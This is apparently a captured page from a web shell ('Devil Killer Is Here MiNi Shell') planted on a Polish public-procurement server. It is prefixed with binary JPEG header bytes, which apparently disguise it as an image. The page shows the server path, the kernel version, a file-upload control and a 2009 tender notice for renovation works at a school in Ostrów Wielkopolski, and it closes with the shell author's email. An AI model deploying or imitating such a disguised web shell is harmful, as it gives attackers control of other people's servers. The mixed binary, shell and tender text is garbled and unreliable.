JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090212/36585-N-2009.html

<p class="kh_header"><b>Ostrów Wielkopolski: wykonanie robót remontowych i modernizacyjnych   p.n.
1/Modernizacja klaso-pracowni językowej (sal nr 7) 
2/Wymiana drzwi wejściowych do budynku 
3/Wykonanie podjazdu do drzwi wejściowych wraz z poręczami oraz wykonanie zjazdudo kondygnacji dolnej budynku (platforma)dla uczniów niepełnosprawnych
4/Modernizacja Sali nr 18 i 18a z przeznaczeniem na pokój nauczycielski z aneksem
    socjalnym 
5/Remont łazienek dla uczniów i personelu ETAP-2009 	     
w budynku IV Liceum im. Fryderyka Chopina Ostrowie Wielkopolskim ul. Wojska Polskiego 17.</b><br>
<b>Numer ogłoszenia: 36585 - 2009; data zamieszczenia: 12.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> IV Liceum Ogólnokształcące im. Fryderyka Chopina , ul. Wojska Polskiego 17, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 0-62 5919449, 7364628, faks 0-62 5919450.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie robót remontowych i modernizacyjnych   p.n.
1/Modernizacja klaso-pracowni językowej (sal nr 7) 
2/Wymiana drzwi wejściowych do budynku 
3/Wykonanie podjazdu do drzwi wejściowych wraz z poręczami oraz wykonanie zjazdudo kondygnacji dolnej budynku (platforma)dla uczniów niepełnosprawnych
4/Modernizacja Sali nr 18 i 18a z przeznaczeniem na pokój nauczycielski z aneksem
    socjalnym 
5/Remont łazienek dla uczniów i personelu ETAP-2009 	     
w budynku IV Liceum im. Fryderyka Chopina Ostrowie Wielkopolskim ul. Wojska Polskiego 17..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> MODERNIZACJA  KLASO - PRACOWNI  JĘZYKOWEJ  (SALA  NR  7),
NA  NISKIM  PARTERZE  W  BUDYNKU  IV  L.O  W  OSTROWIE  WIELKOPOLSKIM.
1.    SALA  NR  7
       Roboty  budowlane:
       1.1  Obsadzenie  podokienników  -  3  szt.,
       1.2  Wykonanie  zabudowy  rur  płytami  g-k  -  7,088  m2,
       1.3  Izolacja  cieplna  podłogi  -  51,654  m2,
       1.4  Posadzka  betonowa  gr.  10  cm,
       1.5  Posadzka  z  płytek  -  51,654  m2,
       1.6  Gładż  gipsowa  na  stropach  -  51,654,
       1.7  Gładź  gipsowa  na  scianach  -  44,724  m2,
       1.8  Malowanie  olejne  -  44,070  m2,
       1.9  Malowanie  farbami  emulsyjnymi  -  95,724  m2.
       Instalacje  c.o.:
       1.10  Montaż  nowych  grzejników  -  3  kpl.
       Instalacje  elektryczne:
       1.11  Ułożenie  przewodóW  -  90  m,
       1.12  Montaż  gniazd  wtyczkowych  -  7  szt.,
       1.13  Montaż  wyłaczników  -  1  szt.
       1.14   Montaż  opraw  oświetleniowych świetlówkowych  -  8  szt.

2.    WYMIANA DRZWI WEJŚCIOWYCH DO BUDYNKU 
        1.1 Drzwi zewnętrzne - 2,604 m2,
        1.2 Domofon + zamek elektromagnetyczny - 1 kpl. 

3.    PODJAZD  DLA  NIEPEŁNOSPRAWNYCH  -  WEJŚCIE  POŁUDNIOWE  DO  IV
       LICEUM  OGÓLNOKSZTAŁCĄCEGO  IM.  FRYDERYKA  CHOPINA  W  OSTROWIE
      WIELKOPOLSKIM  PRZY  ULICY  WOJSKA  POLSKIEGIO  17.

Charakterystyka  techniczna:
1.  Kąt  podjazdu  -  6%,
2.  Długość  pochylni  -  10,0  m,
3.  Szerokość  całkowita  pochylni  -  1,37  cm,
4.  Szerokość  użytkowa  pomiędzy  poręczami  -  105  cm,
5.  Konstrukcja  żelbetowa  -  8,803  m3,
6.  Głębokość  posadowienia  -  0,95  m,
7.  Hmax  =  0,60  m.
Zakres  robót:
0.  Dostawa,  montaż  i  uruchomienie  platformy  dla  niepełnosprawnych  -  1  kpl.
1.  Okładzina  schodów  wejściowych  z  płytek  systemowych  -  14,613  m2
2.  Okładzina  schodów  z  kształtek  systemowych  -  22,25  m
3.  Okładzina  podstopnic  -  1,858  m2
4.  Okładzina  ścian  schodów  -  1,74  m2
5.  Okładzina  podjazdu  z  kształtek  systemowych  -  21,2  m
6.  Okładzina  podjazdu  z  płytek  systemowych  -  9,352  m2
7.  okładzina  ścienna  podjazdu  -  8,0  m2
8.  Balustrady  pochylni  -  23,55  m
9.  Wycieraczki  -  3  kpl.


4. MODERNIZACJA  SALI  NR  18  I  18A  Z  PRZEZNACZENIEM  NA  POKÓJ 
     NAUCZYCIELSKI  Z  ANEKSEM  SOCJALNYM.
1.  POKÓJ  NAUCZYCIELSKI
     1.1    Wykucie otworu przejściowego
     1.2    Izolacja  przeciwwilgociowa  -  67,84  m,
     1.3    Izolacja  cieplna   gr.  7,0  cm  -  61,20  m2,
     1.4    Podkład  betonowy  B20  -  4,284  m3  
     1.5    Posadzka  z  płytek  gressowych  30 x 30  cm  -  61,20  m
     1.6    Cokolik  z  płytek  gressowych  -  32,4  m,
     1.7    Podokienniki  z  konglomeratu  gr.  3 cm  -  4  szt.
     1.8    Oprawy  oświetleniowe  -  12  szt.
     1.9    Gniazda  wtyczkowe  -  8  szt.
     1.10  Przewody  kabelkowe  -  100  m,
     1.11  Wymiana  przełącznika  świecznikowego  -  1  szt.
     1.12  Gładzie  gipsowe  -  (61,20+96,60)m2
     1.13  Dwukrotne  malowanie  farbami  emulsyjnymi  -  157,87  m2.

2.  ZAPLECZE  SOCJALNE
     2.1    Podokienniki  z  konglomeratu  -  1  szt.
     2.2    Oprawy  oświetleniowe  -  2  szt.
     2.3    Gniazda  wtyczkowe  -  4  szt.
     2.4    Przewody  kabelkowe  -  50  m,
     2.5    Fartuszki  do  zlewozmywaka  i  umywalki  -  7,073  m2
     2.6    Zlewozmywak  ze  stali  nierdzewnej  -  1  szt.
     2.7    Umywalka  -  1  szt.
     2.8    Dostawa,  montaż  i  uruchomienie  podgrzewacza  elektrycznego  -  1  kpl.
     2.9    Instalacja  elektryczna  dedykowana  do  podgrzewacza  elektrycznego  -  30  m  
     2.10  Cyklinowanie  posadzki  z  deszczułek  -  16,32  m2
     2.11  Lakierowanie  posadzki  z  deszczułek  -  16,32  m2
     2.12  Gładzie  gipsowe  -  (16,32 + 72,804)  m2 
     2.13  Dwukrotne  malowanie  farbami  emulsyjnymi  -  72,804  m2.

3.  POKÓJ  KONTAKTOWY
     3.1    Otwór przejściowy   -  2,0  m2
     3.2    Oprawy  oświetleniowe  -  2  szt.
     3.3    Gniazda  wtyczkowe  -  3  szt.
     3.4    Przewody  kabelkowe  -  20  m
     3.5    Wymiana  przełącznika  świecznikowego  -  2  szt.
     3.6    Gładzie  gipsowe  (8,16+39,582)  m2
     3.7    Dwukrotne  malowanie  farbami  emulsyjnymi  -  47,742  m2,
     3.8    Cyklinowanie  posadzki  z  deszczułek  -  8,16  m2,
     3.9    Lakierowanie  posadzki  z  deszczułek  -  8,16  m2.

5. REMONT  ŁAZIENEK  DLA  UCZNIÓW  I  PERSONELU  -  ETAP  2009  
1.  REMONT  ŁAZIENEK  DLA  UCZNIÓW  I  PERSONELU
     1.1  Wentylacja  grawitacyjna
            1.1.1  Kanały  z  pustaków  ceramicznych  dla  piwnicy  -  91,8  m,
            1.1.2  Kanały  z  pustaków  ceramicznych  dla  parteru  -  168,0  m,
            1.1.3  Kanały  z  pustaków  ceramicznych  dla  I  piętra  -  198,0  m
     1.2  Piony  sanitarne  i  wodociągowe
            1.2.1  Rurociągi  z  PVC  dn.  160  mm  poziome  -  25  m,
            1.2.2  Rurociągi  z  PVC  pionowe  dn.  160  mm  -  59,2  m
            1.2.3  Rury  wywiewne  -  4  szt.,
            1.2.4  Rurociągi  z  PVCo  dn.  32  mm  -  74,2  m
            1.2.5  Zawory  dn.  32  mm  -  12  szt.
     1.3  Zespół  sanitarny  piwnicy
            1.3.1  Roboty  budowlane
                      1.3.1.1     Podłoże  pod  posadzkę  -  44,0  m2,
                      1.3.1.2     Izolacja  przeciwwilgociowa  -  63,502  m2,
                      1.3.1.3     Izolacja  cieplna    -  44,0  m2,
                      1.3.1.4     Folia  polietylenowa  -  50,6  m2,
                      1.3.1.5     Podkład  betonowy  -  4,4  m3,
                      1.3.1.6     Ścianki  działowe  -  29,337  m2,             
            1.3.2  Roboty  sanitarne
                      1.3.2.1     Rurocigi  PVC  dn.  160  mm  -  19,0  m,
                      1.3.2.6     Wpusty  piwniczne  -  3  szt.,        
            1.3.3  Roboty  elektryczne
                      1.3.3.1     Przewód  wtynkowy  WLZ  -  40  m,
                      1.3.3.2     Przewód  wtynkowy  -  90  m,
                      1.3.3.3     Przewód  wtynkowy  -  50  m,
                      1.3.3.4     Oprawy  oświetleniowe  -  8  szt.,
                      1.3.3.5     Gniazda  wtykowe  -  3  szt.,
                      1.3.3.6     Łączniki  -  8  szt.,
                      1.3.3.7     Pomiary  elektryczne  -  1  kpl..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.45.40.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokosci 5000,00 zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy, którzy zgodnie z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych tekst jedn. Dz. U. z 2007 roku Nr 223 poz. 1655:

1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,

2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,

Warunek ten będzie spełniony przez wykonawcę, jeżeli wykonawca:
a)wykonał w okresie ostatnich pięciu lat, a jeżeli okres działalności jest krótszy - w tym okresie, przynajmniej dwie roboty ogólnobudowlane, na kwotę nie mniejszą niż wartość kontraktu,
b)dysponuje osobami, które: należą do Izby Inżynierów Budownictwa oraz legitymują się następującymi uprawnieniami budowlanymi:
-kierownik budowy (uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej),
-kierownik robót sanitarnych (uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacji),
-kierownik robót elektrycznych (uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych) 

3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,

Warunek ten będzie spełniony przez wykonawcę, jeżeli:
a)jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 150 000,00 zł.

4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,

oraz

5.akceptują wzór umowy (załącznik nr 1),
6.dokonali wizji lokalnej na obiekcie,
7.udzielą gwarancji na wykonane roboty na okres 5 lat, licząc od dnia podpisania protokołu odbioru końcowego.


Zamawiający oceni spełnienie warunków określonych w SIWZ poprzez analizę dokumentów i oświadczeń zawartych w ofercie. Ocena spełniania warunków wymaganych od wykonawców dokonana zostanie w systemie spełnia - nie spełnia na podstawie przedstawionych przez wykonawcę dokumentów potwierdzających spełnienie warunków o których mowa w pkt.VI siwz dołączonych do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych z udziału w postępowaniu o zamówienie publiczne wykonawca składa następujące oświadczenia i dokumenty:

1.aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, w przypadku, gdy wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
2.dokumenty potwierdzające posiadanie uprawnień pełnomocnictw osób podpisujących ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych, 
3.dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, tj. należą do Izby Inżynierów Budownictwa oraz legitymują się następującymi uprawnieniami budowlanymi:
a.kierownik budowy uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej ,
b.kierownik robót sanitarnych uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci i instalacji sanitarnych,
c.kierownik robót elektrycznych uprawnienia w zakresie kierowania robotami w
   specjalności instalacyjnej  w zakresie sieci, instalacji i urządzeń elektrycznych 
4.aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert w przypadku, gdy wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
5.oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 prawa zamówień publicznych z wykorzystaniem wzoru- załącznik nr 3

B. W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia w postępowaniu o zamówienie publiczne składa następujące dokumenty:

1.Wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności -załącznik nr 4 , 
2 Wykaz wykonanych w okresie ostatnich pięciu lat robót budowlanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia tj. wykonali przynajmniej dwie roboty ogólnobudowlane na kwotę nie mniejszą niż wartość kontraktu zpodaniem ich wartości oraz daty i miejsca ich wykonywania z załączeniem dokumentów potwierdzających ich należyte  wykonanie -  załącznik nr 5,
3Oświadczenie wykonawcy o powierzeniu wykonania części zamówienia podwykonawcom załącznik nr 6, 

C.W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia w postępowaniu o zamówienie publiczne składa następujące dokumenty:

1Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na wartość nie mniejszą niż 150 000,00 zł. 

D. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej w postępowaniu o zamówienie publiczne składa następujące dokumenty:

1.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
2.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. D w zakresie określonym art. 24 ust. 1 pkt 4-8 prawa zamówień publicznych, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 

E. Dokumenty wymagane w przypadku składania oferty wspólnej: 

1.Oferta winna zawierać: oświadczenia i dokumenty opisane w punkcie A.1, A.4,A.5 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie  

2Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.czwarteliceum.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> IV Liceum Ogolnokształcace im.Fryderyka Chopina 63-400 Ostrów Wielkopolski ul.Wojska Polskiego 17.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2009 godzina 11:00, miejsce: IV Liceum Ogolnokształcace im.Fryderyka Chopina 63-400 Ostrów Wielkopolski ul.Wojska Polskiego 17 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com